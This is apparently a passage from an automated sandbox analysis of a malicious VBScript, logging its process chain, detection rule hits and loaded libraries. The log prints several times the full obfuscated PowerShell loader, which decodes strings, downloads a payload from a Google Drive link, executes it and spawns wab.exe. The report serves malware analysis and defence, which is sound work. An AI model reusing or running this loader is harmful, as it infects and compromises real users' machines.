buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxan
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8883EDD015_2_00007FF8883EDD01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8883ECF515_2_00007FF8883ECF51
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0750A8C013_2_0750A8C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021CB58918_2_021CB589
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021C4AD018_2_021C4AD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021C3EB818_2_021C3EB8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021CEF8818_2_021CEF88
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021C420018_2_021C4200
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F1C5C22_2_005F1C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F25D322_2_005F25D3
            Source: G4-TODOS.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi64_4632.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_2080.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 4632, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 2080, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@15/8@5/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Coleoptilum.UnwJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbn2mgjy.gfg.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs"
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: (=u22_2_005F1C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: WABOpen22_2_005F1C5C
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCommand line argument: 5_22_2_005F3530
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4632
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2080
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxan
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxan
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
